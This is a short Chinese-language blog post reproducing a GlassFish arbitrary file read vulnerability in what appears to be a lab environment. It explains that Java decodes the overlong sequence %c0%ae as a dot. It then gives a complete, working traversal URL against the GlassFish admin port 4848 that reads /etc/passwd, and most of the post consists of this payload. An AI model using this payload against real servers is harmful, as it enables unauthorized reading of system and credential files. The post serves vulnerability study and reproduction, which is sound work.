天天看點

GlassFish任意檔案讀取漏洞 漏洞複現GlassFish 任意檔案讀取漏洞

GlassFish 任意檔案讀取漏洞

by ADummy

0x00利用路線

​ 直接url執行payload

0x01漏洞介紹

​ java語言中會把

%c0%ae

解析為

\uC0AE

,最後轉義為ASCCII字元的

.

(點)。利用

%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/

來向上跳轉,達到目錄穿越、任意檔案讀取的效果。。

0x02漏洞複現

環境運作後,通路

http://your-ip:8080

http://your-ip:4848

即可檢視web頁面。其中,8080端口是網站内容,4848端口是GlassFish管理中心。

通路

https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

,發現已成功讀取

/etc/passwd

内容:

payload:

`https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd`
           
GlassFish任意檔案讀取漏洞 漏洞複現GlassFish 任意檔案讀取漏洞

繼續閱讀